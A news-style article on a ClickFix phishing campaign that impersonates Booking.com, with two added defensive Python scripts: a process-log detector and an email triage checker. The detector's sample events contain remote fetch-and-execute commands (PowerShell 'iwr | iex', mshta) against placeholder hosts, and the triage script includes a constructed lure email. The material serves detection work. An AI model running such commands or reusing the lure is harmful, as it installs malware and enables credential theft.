
Beware of this phishing scam posing as Booking.com.
Microsoft has warned about a new phishing scam targeting individuals in the hospitality sector.
Hospitality workers should be cautious if they find an email in their inbox that supposedly comes from Booking.com and presents itself as a message from an angry guest, as it could be part of a phishing scam. Microsoft has warned about an ongoing phishing campaign that sends fraudulent emails impersonating Booking.com, aimed at tricking users into downloading malicious software.
In a statement, Microsoft Threat Intelligence highlighted that this campaign has been active since December of the previous year and utilizes a social engineering technique known as ClickFix. The emails that reach the victims may vary in content, ranging from guest complaints to inquiries from potential customers or account verifications, and include a link or a PDF attachment with a link that appears to direct the user to Booking.com to resolve the issue.
By clicking on the link, users are taken to a screen that simulates a CAPTCHA overlaid on the Booking.com page. However, this CAPTCHA actually instructs the user to open the Windows Run dialog and enter a command that downloads malware onto their system. Once installed, the malware can steal financial information and credentials, consistent with a technique used in earlier phishing campaigns by a group identified as Storm-1865.
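From the defender's side, the ClickFix step described above leaves a recognisable trace on the endpoint: a command entered into the Run dialog is launched with explorer.exe as its parent, and the pasted command is a script interpreter that fetches something from a remote URL. The following added example (not code from Microsoft's advisory) scans process-creation records for that combination. The key=value log format, the field names, the list of interpreters and the sample events are all constructed for this demonstration; the parser would need to be adapted to a real Sysmon or EDR export.

```python
"""Flag process-creation events that match the ClickFix pattern: a command
typed into the Windows Run dialog (parent explorer.exe) that starts a script
interpreter and references a remote URL on its command line.

Added example, not from Microsoft's advisory. The log format, field names,
interpreter list and sample events are constructed for this demo.
"""
import re

# Interpreters commonly launched from the Run dialog in ClickFix lures
# (assumption: extend with what your environment actually observes).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"""https?://[^\s'"]+""", re.IGNORECASE)

# Constructed sample events in a simple key=value line format.
# Events 1 and 4 match the pattern; 2 (not an interpreter) and 3 (parent is
# cmd.exe, no URL) are benign administrative activity.
SAMPLE_EVENTS = """\
ts=2025-03-13T09:12:01Z host=FRONTDESK-01 user=reception parent=explorer.exe image=powershell.exe cmd="powershell -w hidden -c iwr http://example.invalid/verify | iex"
ts=2025-03-13T09:12:05Z host=FRONTDESK-01 user=reception parent=explorer.exe image=notepad.exe cmd="notepad.exe C:\\Users\\reception\\notes.txt"
ts=2025-03-13T09:15:22Z host=FRONTDESK-02 user=admin parent=cmd.exe image=powershell.exe cmd="powershell -File C:\\scripts\\backup.ps1"
ts=2025-03-13T09:20:40Z host=FRONTDESK-03 user=reception parent=explorer.exe image=mshta.exe cmd="mshta https://example.invalid/captcha.hta"
"""

# key=value pairs; values may be double-quoted and contain spaces.
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_event(line):
    """Parse one key=value line into a dict; quoted values lose their quotes."""
    ev = {}
    for key, val in KV_RE.findall(line):
        if val.startswith('"') and val.endswith('"'):
            val = val[1:-1]
        ev[key] = val
    return ev


def is_clickfix_like(ev):
    """Run-dialog launches have explorer.exe as the parent; the pasted command
    is an interpreter whose command line references a URL."""
    return (
        ev.get("parent", "").lower() == "explorer.exe"
        and ev.get("image", "").lower() in INTERPRETERS
        and URL_RE.search(ev.get("cmd", "")) is not None
    )


def find_suspicious(log_text):
    """Return (host, user, image, url) for every event matching the pattern."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if is_clickfix_like(ev):
            url = URL_RE.search(ev["cmd"]).group(0)
            hits.append((ev["host"], ev["user"], ev["image"], url))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print("ClickFix-like execution:", hit)
```

The parent-process condition is what separates this from ordinary scripted administration (event 3 above): a scheduled task or an admin's console session will not have explorer.exe as the parent of the interpreter, whereas anything a user types into the Run dialog will.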
Although phishing scams are common today, this campaign is particularly sophisticated because it exploits hospitality workers' concern for customer satisfaction. To protect against phishing attempts like this, Microsoft advises users to check the sender's address, be wary of messages that convey urgency or threaten consequences, and hover over links to view the full URL before clicking on them. When in doubt, go directly to the service provider's site, such as Booking.com, rather than clicking on a link.
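The three checks Microsoft recommends (sender address, urgency language, real link destination) can be applied automatically at the mail gateway or in a triage script before anyone clicks. The added example below is not code from Microsoft or Booking.com. It parses a message constructed to resemble the lure described in this article, treats booking.com as the only legitimate sender domain (an assumption for the demo), and uses a reserved .invalid name for the lure domain.

```python
"""Apply the recommended checks to an inbound message: does the sender
address match the brand in the display name, does the text push urgency,
and where do the links actually point (the automated form of 'hover over
the link')?

Added example, not from Microsoft or Booking.com. The message is
constructed; booking.com as the sole trusted domain is an assumption.
"""
from email import policy
from email.parser import BytesParser
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_DOMAINS = {"booking.com"}  # assumption for this demo
URGENCY_TERMS = ("urgent", "immediately", "within 24 hours", "suspended", "complaint")

# Constructed sample message in the style the article describes.
SAMPLE_EML = b"""\
From: "Booking.com Partner Support" <support@booking-partner-help.invalid>
Reply-To: guests@booking-partner-help.invalid
To: frontdesk@example-hotel.invalid
Subject: Urgent: guest complaint requires your response
Content-Type: text/html; charset="utf-8"

<html><body>
<p>A guest has filed a complaint about their stay. Respond immediately
to avoid suspension of your listing.</p>
<p><a href="https://verify.booking-partner-help.invalid/case/4411">https://admin.booking.com/hotel/complaints</a></p>
</body></html>
"""


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) pairs so the URL shown to the reader can
    be compared with the real destination."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable(host):
    """Last two labels of a hostname; crude, but enough for the demo.
    Production code should use a public-suffix-list library."""
    return ".".join(host.lower().split(".")[-2:]) if host else ""


def triage(raw):
    """Return a list of human-readable findings; empty means nothing flagged."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []

    # 1. Brand name in the display name, but the address is from elsewhere.
    sender = msg["From"].addresses[0]
    sender_domain = registrable(sender.domain)
    brand_claimed = any(d.split(".")[0] in sender.display_name.lower()
                        for d in TRUSTED_DOMAINS)
    if brand_claimed and sender_domain not in TRUSTED_DOMAINS:
        findings.append(f"display name claims a brand but sender domain is {sender_domain}")

    # 2. Urgency or threat language in subject or body.
    body = msg.get_body(preferencelist=("html", "plain")).get_content()
    text = (msg["Subject"] + " " + body).lower()
    hits = [t for t in URGENCY_TERMS if t in text]
    if hits:
        findings.append("urgency language: " + ", ".join(hits))

    # 3. Link text that shows one domain while the href goes to another,
    #    or any link that leaves the trusted domains.
    ex = LinkExtractor()
    ex.feed(body)
    for href, shown in ex.links:
        href_dom = registrable(urlparse(href).hostname or "")
        shown_dom = registrable(urlparse(shown).hostname or "") if shown.startswith("http") else ""
        if shown_dom and shown_dom != href_dom:
            findings.append(f"link shows {shown_dom} but points to {href_dom}")
        elif href_dom not in TRUSTED_DOMAINS:
            findings.append(f"link to untrusted domain {href_dom}")
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EML):
        print("-", f)
```

Run against the constructed message, the script reports all three findings: the display name says Booking.com while the address does not, the subject and body use urgency terms, and the visible link text shows a booking.com URL while the href leads to the lure domain. A message that passes all three checks still deserves the manual fallback the article gives: open the provider's site directly rather than following the link.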